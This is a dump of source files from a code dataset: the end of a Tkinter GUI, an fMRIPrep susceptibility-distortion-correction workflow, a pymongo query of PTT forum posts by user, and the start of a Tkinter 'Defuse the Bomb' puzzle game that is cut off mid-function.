columnspan=5)\n\n\n # Scrollbars, interesting shit\n leftListScrollbar.grid(row=0, column=5, rowspan=14)\n rightScrollbar.grid(row=0, column=13, rowspan=13)\n\n # Invoke default button values\n wordRadioButton.invoke()\n\n leftListFrameCanvas.create_window((0,0), window=leftListFrame, anchor=\"nw\")\n rightCanvas.create_window((0,0), window=rightDataFrame, anchor=\"nw\")\n\n self.master.mainloop()\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":37224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445099042","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nApply susceptibility distortion correction (SDC)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n.. 
topic :: Abbreviations\n\n fmap\n fieldmap\n VSM\n voxel-shift map -- a 3D nifti where displacements are in pixels (not mm)\n DFM\n displacements field map -- a nifti warp file compatible with ANTs (mm)\n\n\"\"\"\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nimport pkg_resources as pkgr\n\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces.ants import CreateJacobianDeterminantImage\nfrom niworkflows.interfaces.registration import ANTSApplyTransformsRPT, ANTSRegistrationRPT\nfrom niworkflows.interfaces.masks import ComputeEPIMask\n\nfrom fmriprep.interfaces import itk\nfrom fmriprep.interfaces import ReadSidecarJSON\nfrom fmriprep.interfaces.bids import DerivativesDataSink\n\n\ndef init_sdc_unwarp_wf(name='sdc_unwarp_wf', settings=None):\n \"\"\"\n This workflow takes in a displacements fieldmap and calculates the corresponding\n displacements field (in other words, an ANTs-compatible warp file).\n \n It also calculates a new mask for the input dataset that takes into account the distortions.\n The mask is restricted to the field of view of the fieldmap since outside of it corrections could not be performed.\n\n .. workflow ::\n\n from fmriprep.workflows.fieldmap.unwarp import init_sdc_unwarp_wf\n wf = init_sdc_unwarp_wf(settings={'reportlets_dir': '.', 'ants_nthreads': 8})\n\n\n Inputs\n\n in_reference\n the reference image\n in_mask\n a brain mask corresponding to ``in_reference``\n name_source\n path to the original _bold file being unwarped\n fmap\n the fieldmap in Hz\n fmap_ref\n the reference (anatomical) image corresponding to ``fmap``\n fmap_mask\n a brain mask corresponding to ``fmap``\n\n\n Outputs\n\n out_reference\n the ``in_reference`` after unwarping\n out_warp\n the corresponding :abbr:`DFM (displacements field map)` compatible with\n ANTs\n out_jacobian\n the jacobian of the field (for drop-out alleviation)\n out_mask\n mask of the unwarped input file\n out_mask_report\n reportled for the skullstripping\n\n \"\"\"\n\n if settings is None:\n # Don't crash if workflow used outside fmriprep\n settings = {'ants_nthreads': 6}\n\n workflow = pe.Workflow(name=name)\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['in_reference', 'in_mask', 'name_source',\n 'fmap_ref', 'fmap_mask', 'fmap']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_reference', 'out_warp', 'out_mask',\n 'out_jacobian', 'out_mask_report']), name='outputnode')\n\n meta = pe.Node(ReadSidecarJSON(), name='meta')\n\n explicit_mask_epi = pe.Node(fsl.ApplyMask(), name=\"explicit_mask_epi\")\n\n # Register the reference of the fieldmap to the reference\n # of the target image (the one that shall be corrected)\n ants_settings = pkgr.resource_filename('fmriprep', 'data/fmap-any_registration.json')\n if settings.get('debug', False):\n ants_settings = pkgr.resource_filename(\n 'fmriprep', 'data/fmap-any_registration_testing.json')\n fmap2ref_reg = pe.Node(ANTSRegistrationRPT(generate_report=True,\n from_file=ants_settings, output_inverse_warped_image=True,\n output_warped_image=True, num_threads=settings['ants_nthreads']),\n name='fmap2ref_reg')\n fmap2ref_reg.interface.num_threads = settings['ants_nthreads']\n\n ds_reg = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg'), name='ds_reg')\n\n # Map the VSM into the EPI space\n fmap2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=True, 
dimension=3, interpolation='BSpline', float=True),\n name='fmap2ref_apply')\n\n fmap_mask2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n name='fmap_mask2ref_apply')\n\n ds_reg_vsm = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg_vsm'), name='ds_reg_vsm')\n\n # Fieldmap to rads and then to voxels (VSM - voxel shift map)\n torads = pe.Node(niu.Function(function=_hz2rads), name='torads')\n\n gen_vsm = pe.Node(fsl.FUGUE(save_unmasked_shift=True), name='gen_vsm')\n # Convert the VSM into a DFM (displacements field map)\n # or: FUGUE shift to ANTS warping.\n vsm2dfm = pe.Node(itk.FUGUEvsm2ANTSwarp(), name='vsm2dfm')\n jac_dfm = pe.Node(CreateJacobianDeterminantImage(\n imageDimension=3, outputImage='jacobian.nii.gz'), name='jac_dfm')\n\n unwarp_reference = pe.Node(ANTSApplyTransformsRPT(dimension=3,\n generate_report=False,\n float=True,\n interpolation='LanczosWindowedSinc'),\n name='unwarp_reference')\n\n fieldmap_fov_mask = pe.Node(niu.Function(function=_fill_with_ones), name='fieldmap_fov_mask')\n\n fmap_fov2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n name='fmap_fov2ref_apply')\n\n apply_fov_mask = pe.Node(fsl.ApplyMask(), name=\"apply_fov_mask\")\n\n ref_msk_post = pe.Node(ComputeEPIMask(generate_report=True, dilation=1),\n name='ref_msk_post')\n\n workflow.connect([\n (inputnode, meta, [('name_source', 'in_file')]),\n (inputnode, explicit_mask_epi, [('in_reference', 'in_file'),\n ('in_mask', 'mask_file')]),\n (inputnode, fmap2ref_reg, [('fmap_ref', 'moving_image')]),\n (inputnode, fmap2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, fmap_mask2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_mask2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, ds_reg_vsm, [('name_source', 'source_file')]),\n (fmap2ref_apply, ds_reg_vsm, [('out_report', 'in_file')]),\n (explicit_mask_epi, fmap2ref_reg, [('out_file', 'fixed_image')]),\n (inputnode, ds_reg, [('name_source', 'source_file')]),\n (fmap2ref_reg, ds_reg, [('out_report', 'in_file')]),\n (inputnode, fmap2ref_apply, [('fmap', 'input_image')]),\n (inputnode, fmap_mask2ref_apply, [('fmap_mask', 'input_image')]),\n (fmap2ref_apply, torads, [('output_image', 'in_file')]),\n (meta, gen_vsm, [(('out_dict', _get_ec), 'dwell_time'),\n (('out_dict', _get_pedir_fugue), 'unwarp_direction')]),\n (meta, vsm2dfm, [(('out_dict', _get_pedir_bids), 'pe_dir')]),\n (torads, gen_vsm, [('out', 'fmap_in_file')]),\n (vsm2dfm, unwarp_reference, [('out_file', 'transforms')]),\n (inputnode, unwarp_reference, [('in_reference', 'reference_image')]),\n (inputnode, unwarp_reference, [('in_reference', 'input_image')]),\n (vsm2dfm, outputnode, [('out_file', 'out_warp')]),\n (vsm2dfm, jac_dfm, [('out_file', 'deformationField')]),\n (inputnode, fieldmap_fov_mask, [('fmap_ref', 'in_file')]),\n (fieldmap_fov_mask, fmap_fov2ref_apply, [('out', 'input_image')]),\n (inputnode, fmap_fov2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_fov2ref_apply, [('composite_transform', 'transforms')]),\n (fmap_fov2ref_apply, apply_fov_mask, [('output_image', 'mask_file')]),\n (unwarp_reference, apply_fov_mask, [('output_image', 'in_file')]),\n (apply_fov_mask, ref_msk_post, [('out_file', 'in_file')]),\n (apply_fov_mask, 
outputnode, [('out_file', 'out_reference')]),\n (ref_msk_post, outputnode, [('mask_file', 'out_mask')]),\n (ref_msk_post, outputnode, [('out_report', 'out_mask_report')]),\n (jac_dfm, outputnode, [('jacobian_image', 'out_jacobian')]),\n ])\n\n if not settings.get('fmap_bspline', False):\n workflow.connect([\n (fmap_mask2ref_apply, gen_vsm, [('output_image', 'mask_file')])\n ])\n\n if settings.get('fmap-demean', True):\n # Demean within mask\n demean = pe.Node(niu.Function(function=_demean), name='demean')\n\n workflow.connect([\n (gen_vsm, demean, [('shift_out_file', 'in_file')]),\n (fmap_mask2ref_apply, demean, [('output_image', 'in_mask')]),\n (demean, vsm2dfm, [('out', 'in_file')]),\n ])\n\n else:\n workflow.connect([\n (gen_vsm, vsm2dfm, [('shift_out_file', 'in_file')]),\n ])\n\n return workflow\n\n# Helper functions\n# ------------------------------------------------------------\n\n\ndef _get_ec(in_dict):\n return float(in_dict['EffectiveEchoSpacing'])\n\n\ndef _get_pedir_bids(in_dict):\n return in_dict['PhaseEncodingDirection']\n\n\ndef _get_pedir_fugue(in_dict):\n return in_dict['PhaseEncodingDirection'].replace('i', 'x').replace('j', 'y').replace('k', 'z')\n\n\ndef _hz2rads(in_file, out_file=None):\n \"\"\"Transform a fieldmap in Hz into rad/s\"\"\"\n from math import pi\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n if out_file is None:\n out_file = genfname(in_file, 'rads')\n nii = nb.load(in_file)\n data = nii.get_data() * 2.0 * pi\n nb.Nifti1Image(data, nii.get_affine(),\n nii.get_header()).to_filename(out_file)\n return out_file\n\n\ndef _demean(in_file, in_mask, out_file=None):\n import numpy as np\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n\n if out_file is None:\n out_file = genfname(in_file, 'demeaned')\n nii = nb.load(in_file)\n msk = nb.load(in_mask).get_data()\n data = nii.get_data()\n data -= np.median(data[msk > 0])\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(\n out_file)\n return out_file\n\n\ndef _fill_with_ones(in_file):\n import nibabel as nb\n import numpy as np\n import os\n\n nii = nb.load(in_file)\n data = np.ones(nii.shape)\n\n out_name = os.path.abspath(\"out.nii.gz\")\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_name)\n\n return out_name\n","sub_path":"fmriprep/workflows/fieldmap/unwarp.py","file_name":"unwarp.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"262115677","text":"import pymongo\nfrom pymongo import MongoClient\n\ndef main():\n\t# parseAuthor('OtsukaAi')\n\t#queryUser('OtsukaAi', 'myhome6206')\n\tqueryUser('Gossiping', 'blza')\n\ndef queryUser(board, username):\n\tclient = MongoClient('localhost', 27017)\n\tcollection = client['Ptt']['Weekarticle' + board]\n\n\tuser_record = collection.find({\n\t\t'$or':[\n\t\t\t{'author.account': username},\n\t\t\t{'messages':{\n\t\t\t\t\t'$elemMatch':{'push_userid': username}\n\t\t\t}}\n\t\t]\n\t}).sort('date', pymongo.DESCENDING)\n\treturn user_record\n\n\t#for record in user_record:\n\t#\tprint record['article_title'], record['date']\n\nif __name__ == '__main__':\n\tmain()","sub_path":"web/Pttuser.py","file_name":"Pttuser.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"8803037","text":"# \"Bomb_Game\" By: Alston Sanford\n\n# 
----------------------------------------------------------------------------------------------------------------------\n# Import Modules, Create Initial Canvas, and Begin Initial Code\n# ----------------------------------------------------------------------------------------------------------------------\n\nfrom Tkinter import *\n# import os\nimport time\nimport webbrowser\n# import math\n# import random\nimport pickle\nimport anydbm\nimport background_premade_code\n\n\nclass ANSI:\n RED = '\\033[91m'\n END = '\\033[0m'\n\nmain_canvas = Tk()\nmain_canvas.title(\"Defuse the Bomb!\")\ngame_window = Canvas(main_canvas, width=1080, height=680, bg=\"black\")\ngame_window.grid(row=0, columnspan=4)\n\nsaw = PhotoImage(file='images/bomb_game_images/saw.gif')\nwires = PhotoImage(file='images/bomb_game_images/ibg_1080x720.gif')\nexplode = PhotoImage(file='images/bomb_game_images/explosion.gif')\ndefused = PhotoImage(file='images/bomb_game_images/defused.gif')\nwin_screen = PhotoImage(file='images/bomb_game_images/win_screen.gif')\ngame_over = PhotoImage(file='images/bomb_game_images/game_over.gif')\n\ncountdown_stopped = False\nout_of_time = False\nerror = False\n\nglobal increment\nincrement = 1\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Create commands\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef countdown(n):\n start_button.destroy()\n if n == 90:\n global t0\n t0 = time.clock()\n game_window.bind(\"\", cut_wire) # enable clicking on game_window\n pause_button.config(state=NORMAL, cursor='wait')\n hint_button.config(state=NORMAL, cursor='question_arrow')\n status_box.delete(0, END)\n status_box.insert(0, \"ARMED\")\n status_box.config(bg='red')\n hint_box.delete(0, END)\n hint_box.insert(0, 'Caboose')\n game_window.create_image(0, 0, image=wires, anchor=NW)\n global out_of_time\n if out_of_time:\n return\n global countdown_stopped\n if countdown_stopped:\n timer_box.delete(0, END)\n timer_box.insert(0, '')\n countdown_stopped = False # Update this for the next bomb\n pause_button.config(state=DISABLED)\n hint_button.config(state=DISABLED)\n status_box.delete(0, END)\n status_box.insert(0, 'DISARMED')\n status_box.config(bg='green')\n return\n if n < 0:\n lose()\n return\n else:\n timer_box.delete(0, END)\n timer_box.insert(0, n) # keep the countdown going\n main_canvas.after(1000, countdown, n-increment) # wait one second, then continue countdown.\n global error\n if error:\n timer_box.delete(0, END)\n timer_box.insert(0, 'ERROR')\n timer_box.config(bg='black', fg='red')\n\n\ndef hint():\n global hints_remaining\n if hints_remaining == 2:\n hints_remaining -= 1\n hints_remaining_box.delete(0, END)\n hints_remaining_box.insert(0, hints_remaining)\n hint_box.delete(0, END)\n hint_box.insert(0, 'Take this and the story ends')\n else:\n hint_button.config(state=DISABLED, cursor='arrow')\n hints_remaining_box.delete(0, END)\n hints_remaining_box.insert(0, \"YOU'RE OUT!\")\n hint_box.delete(0, END)\n hint_box.insert(0, 'Eiffel 65')\n\n\ndef trap():\n global increment\n increment = 10\n pause_button.config(state=DISABLED, cursor='arrow')\n hint_button.config(state=DISABLED, cursor='arrow')\n hints_remaining_box.delete(0, END)\n hints_remaining_box.insert(0, 'DEATH IS COMING')\n hint_box.delete(0, END)\n hint_box.insert(0, 'BOOBY TRAP ACTIVATED')\n\n\ndef lose(): # LOSE\n game_window.unbind(\"